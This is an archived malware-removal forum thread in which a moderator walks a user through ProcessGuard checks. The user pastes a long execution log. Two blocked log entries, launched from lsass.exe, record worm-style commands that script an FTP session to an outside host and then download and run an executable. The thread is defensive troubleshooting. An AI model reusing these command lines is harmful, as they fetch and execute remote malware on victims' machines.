help i have trojan horse collected.5.L [RESOLVED]


  • This topic is locked

#196
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Not much there.

In ProcessGuard on the Protection Tab you will see applications that have "Install Global Hooks" behind their name in the "Other Options" column.

Can you make a list of these applications and post them?

Regards,
  • 0

#197
duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hello,
Sorry it has taken a while to get back to you.
4 applications have "Install Global Hooks" attached to them. They are:
explorer.exe
ieexplorer.exe
msimn.exe
procguard.exe
Hope this is what you are looking for.
The computer keeps locking up and going slow when in use on the internet.
Cheers

Edited by duglartis, 19 October 2005 - 01:41 AM.

  • 0

#198
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Can you check this one for spelling errors:
ieexplorer.exe

The name of the real file is iexplore.exe

If the way you spelled it is really the one in the list, proceed as follows:
- Open the Process Guard Protection tab
- Select the application and click "Remove Application(s)"
- Then open the Security tab and see if the application is listed there as well
- If so, select it and click "Remove Application(s)"

Then reboot your computer and see if you can find the file.
I would be very interested in obtaining a copy if it does.

Regards,
  • 0

#199
duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Sorry, it was a typo from this end; the correct name exists: iexplore.exe.
Where to next?
Thanks for your help.
  • 0

#200
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
In the ProcessGuard folder you will find a subfolder called logs.

Can you post as much as possible of the log that is next to newest?
As much as will fit into one post.

Guessing it will be called pglog_09_2005.txt

Regards,
  • 0

#201
duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
---Process Guard Log Started---
Thu 01 - 18:33:44 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Thu 01 - 18:33:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1320]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Thu 01 - 18:33:45 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Thu 01 - 18:33:45 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1192]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Thu 01 - 18:33:47 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Thu 01 - 18:33:47 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Thu 01 - 18:33:48 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Thu 01 - 18:33:48 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1900]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Thu 01 - 18:33:49 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Thu 01 - 18:33:49 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Thu 01 - 18:33:50 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Thu 01 - 18:33:50 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\rundll32.exe fldrclnr.dll,wizard_rundll ]
Thu 01 - 18:33:51 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Thu 01 - 18:33:52 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Thu 01 - 18:33:52 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Thu 01 - 18:33:52 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [220]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Thu 01 - 18:33:53 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Thu 01 - 18:33:55 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Thu 01 - 18:34:31 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds9d9a65830e63144894dc6c329089b226 ]
Thu 01 - 18:34:31 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa9625f2af054fe46bb11c9f5df72cdab ]
Thu 01 - 18:34:31 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds34aff79d4b0e34498963eb59013c6781 ]
Thu 01 - 18:34:32 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa87c9ba41bf70c4fbac6ff8db43dd87d ]
Thu 01 - 18:34:57 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Thu 01 - 18:35:59 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1192]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Thu 01 - 18:37:08 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avginet.exe" [920]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /update "c:\documents and settings\all users\application data\grisoft\avg7data\avg7upd\install\u-fwd.idx" ]
Thu 01 - 18:41:06 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd /c echo open 202.124.130.5 20554 > i&echo user 1 1 >> i &echo get eraseme_14046.exe >> i &echo quit >> i &ftp -n -s:i &eraseme_14046.exe
]
Thu 01 - 18:51:54 [EXECUTION] "c:\windows\system32\wscript.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\wscript.exe "c:\documents and settings\dug and tania\desktop\regsrch.vbs" ]
Thu 01 - 18:52:14 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\wscript.exe" [1900]
[EXECUTION] Commandline - [ "c:\windows\regedit.exe" /e /a c:\docume~1\dugand~1\locals~1\temp\regtmp.tmp ]
Thu 01 - 18:53:10 [EXECUTION] "c:\windows\system32\wscript.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\wscript.exe "c:\documents and settings\dug and tania\desktop\regsrch.vbs" ]
Thu 01 - 18:53:22 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\wscript.exe" [180]
[EXECUTION] Commandline - [ "c:\windows\regedit.exe" /e /a c:\docume~1\dugand~1\locals~1\temp\regtmp.tmp ]
Thu 01 - 19:04:32 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds2d3b728a8f92b0428eeccc917ddb775d ]
Thu 01 - 19:04:32 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsbfe757b031782c4e991d507de846a579 ]
Thu 01 - 19:12:00 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]

---Process Guard Log Started---
Fri 02 - 16:40:13 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Fri 02 - 16:40:13 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1324]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Fri 02 - 16:40:14 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Fri 02 - 16:40:15 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1172]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Fri 02 - 16:40:17 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Fri 02 - 16:40:17 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Fri 02 - 16:40:17 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Fri 02 - 16:40:18 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1880]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Fri 02 - 16:40:18 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Fri 02 - 16:40:19 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Fri 02 - 16:40:19 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Fri 02 - 16:40:20 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Fri 02 - 16:40:20 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Fri 02 - 16:40:20 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Fri 02 - 16:40:21 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Fri 02 - 16:40:22 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [112]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Fri 02 - 16:40:23 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Fri 02 - 16:40:25 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Fri 02 - 16:40:40 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]
Fri 02 - 16:40:45 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]
Fri 02 - 16:41:00 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds2ee088d2925ec548bfaba68e0093f630 ]
Fri 02 - 16:41:01 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds03bc5f1ba831f944865463390f70b7b4 ]
Fri 02 - 16:41:01 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4bb27ed39252774b855f8316a978f00b ]
Fri 02 - 16:41:01 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds26ffe7190170e24f94f39e12d5e2e9f9 ]
Fri 02 - 16:41:57 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1172]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]
Fri 02 - 16:42:05 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avginet.exe" [2296]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /update "c:\documents and settings\all users\application data\grisoft\avg7data\avg7upd\install\u-fwd.idx" ]
Fri 02 - 17:11:03 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds6a2c21e8115cbd40b29688a744047aba ]
Fri 02 - 17:11:03 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds9452ad1714ff554f9cbc68d062aa8683 ]
Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\defrag.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\defrag.exe" -p 2a4 -s 00000ec4 -b c: ]
Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds741fc4de26fe7846a71325c3cf4490f3 ]
Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf49c9513fb8c714c97f061c313d4cbbe ]
Fri 02 - 18:32:38 [EXECUTION] "c:\program files\grisoft\avg free\avgwb.dat" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1912]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgwb.dat" /switchui ]
Fri 02 - 19:16:38 [EXECUTION] "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" /embedding ]
Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdse322dd4ea69d034095a8ce31cbd8c16a ]
Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd87d725ed55ddf43b2d2a850a348b7e9 ]
Fri 02 - 19:17:15 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Fri 02 - 19:19:05 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Fri 02 - 19:20:26 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe
]
Fri 02 - 19:46:35 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" /d shell32.dll,control_rundll desk.cpl ]
Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds63b9778dae548549a82735d30a6f329b ]
Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsce7988fd05875749b273a58ea28e7fe5 ]
Fri 02 - 19:48:56 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Fri 02 - 20:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds100f70ec0af9e4498ceff70d9b58635d ]
Fri 02 - 20:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds8f7c487b45a5884da1b8832798a5e40a ]
Fri 02 - 20:32:51 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1000]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Fri 02 - 20:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd51c3ca92f283948a37494ed77c331c6 ]
Fri 02 - 20:46:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds87396767371d014dafef6fb7b5223077 ]
Fri 02 - 21:16:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb05df5bdb085f44aa015be57016a8398 ]
Fri 02 - 21:16:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf514e8f58fd29543bae2eba6a81ffa4d ]
Fri 02 - 21:20:31 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]

---Process Guard Log Started---
Sat 03 - 16:23:21 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 03 - 16:23:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1440]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 03 - 16:23:21 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [476]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 03 - 16:23:21 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1044]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /test=2 ]
Sat 03 - 16:23:24 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Sat 03 - 16:23:24 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Sat 03 - 16:23:25 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Sat 03 - 16:23:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Sat 03 - 16:23:26 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Sat 03 - 16:23:26 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1948]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 03 - 16:23:26 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 03 - 16:23:27 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 03 - 16:23:27 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 03 - 16:23:28 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 03 - 16:23:29 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1184]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
